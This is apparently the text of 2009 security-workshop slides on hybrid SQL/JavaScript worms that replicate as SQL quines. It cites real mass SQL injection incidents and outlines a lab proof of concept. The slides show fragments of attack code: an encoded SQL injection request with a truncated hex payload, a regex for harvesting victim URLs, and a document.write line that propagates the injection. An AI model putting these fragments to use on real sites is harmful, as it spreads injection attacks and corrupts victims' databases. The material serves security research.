August 26th, 2009

SQL/JavaScript Hybrid Worms

As Two-stage Quines
Workshop Seguridad Informática 2009 – 38 JAIIO (MDQ)
Lic. José Orlicki (jorlicki@)

Page 1 - CONFIDENTIAL -
Not-So-Secret Agenda

 Motivation
 Hybrid Scenario
 Features Discussion
 Proof of Concept Highlights
 Demo&Discussion!?
Abstract: a what-if worm scenario based on
SQL/JS real incidents and prototype code,
leads to proof-of-concept on laboratory with
widely-deployed technologies (unhardened).
Helps anticipate future trends and protections.

Page 2 - DECLASSIFIED -
Attacks in the Wild! (2008)

 [..]Anyone know about www.nihaorr1.com/1.js? The db that

supports our companies ecommerce is lling up with this url[..]
 [..]The script www.nihaorr1.com/1.js is getting inserted into every
record of my organizations SQL db. I'm the accidental techie in my
oce, and I'm clueless[..]
 Huge Web Hack Attack Infects Many Pages Gregg Keizer,
Computerworld (nihaorr1 -> favorite search engine)
Page 3 - CONFIDENTIAL -
Prototype of infected RFIDs! (2006)

 Is Your Cat Infected with a Computer Virus? Melanie R. Rieback,

Bruno Crispo, Andrew S. Tanenbaum
 SQL Virus Prototype propaging via RFID tags. (Virus != Worm?)
 Uses SQL Quines, self-replicating statements.

Page 4 --
SQL and JavaScript can
be combined in a Worm?

Page 5 - CONFIDENTIAL -
Basic Quines in T-SQL and Javascript

 Version 1: quine classic techniques in T-SQL

Page 6 - NOT CONFIDENTIAL -

Basic Quines in T-SQL and Javascript

 Version 2: quine using native reflection hack in T-SQL

Page 7 - NOT CONFIDENTIAL -

Basic Quines in T-SQL and Javascript

 Version 3 (fail!): quine classic and native getElementById()

techniques in SQL
 Similar to Version 1 but on the JS/client-side

 Similar to Version 2 but idem…

Page 8 - NOT CONFIDENTIAL -

Proof of Concept

 Lab:
1. CherryPy,
2. Two ad-hoc-vulnerable webapps in different domains,
3. MS-SQL.
4. Python SQL interface, no modifications.

 Two-stage self-replication.
 Targets VARCHAR and TEXT db fields, ALL TABLEs…

 Version 1: MS-SQL Quines, JavaScript regexes to extract new

possibles victim URL, blind injection. (7359 bytes of SQLi egg)
 Version 2: MS-SQL Reflective Features. (3000 bytes aprox, idem)
 Version 3 (fail!): JavaScript quines and reflection worked,
complete worm don’t. (estimating 1500 bytes)

Page 9 - CONFIDENTIAL -
Proof of Concept (cont.)

 SQL Hex and URL Encoding: stealthness and SQLi correctness. 4-

variable (original, 1 variable, 2008) scattered egg

http://192.168.1.105:8081/greetUser?numid=1%3BDECLAR
E+@S+VARCHAR(MAX),@S2+VARCHAR(MAX),@S3+VARCHAR(MAX),
@S4+VARCHAR(MAX)%3BSET+@S=CAST(0x0d0a444398498468...

 Regex matching for detecting possible new victim sites.

var regexp = new RegExp("[a-zA-Z0-9-.?_&=:\/]+\/[a-
zA-Z0-9-\.?_&=]+=[0-9]+","g");
var m = infected_html.match(regexp);

 Javascript blind XSS for progapagation (very naive!)

document.write(
"<img src="+NEW_VICTIM_URL+sql_egg+">“
);
Page 10 - NOT CONFIDENTIAL -
¡Hybrid Worms Discussion!

 Billy Hoffman and John Terrill. The Little

Hybrid Web Worm that Could, Black-Hat USA
2007. (they focus in JS obfuscation and Perl)

 No choke point.
 Stealthier infections.
 More portability (interpreted lang?)
 Target generic vulnerabilities (idem)
 Easily obfuscated (idem)
 Less crashes (idem)
 Data/Web 2.0/Cloud centric?
Page 11 - CONFIDENTIAL -
Demostration!?

...but I can only show you the door. You're the one that has to walk
through it...

Acknowledgements:
- Core Security Team: support and creative environment.
- Sebastián Cufre: T-SQL tricks.
- Aureliano Calvo: Javascript concepts.
- Pedro Varangot: suitable testing computer.

Page 12 - DECLASSIFIED -
Questions?

 Thanks!
 Contact:

Page 13 - CONFIDENTIAL -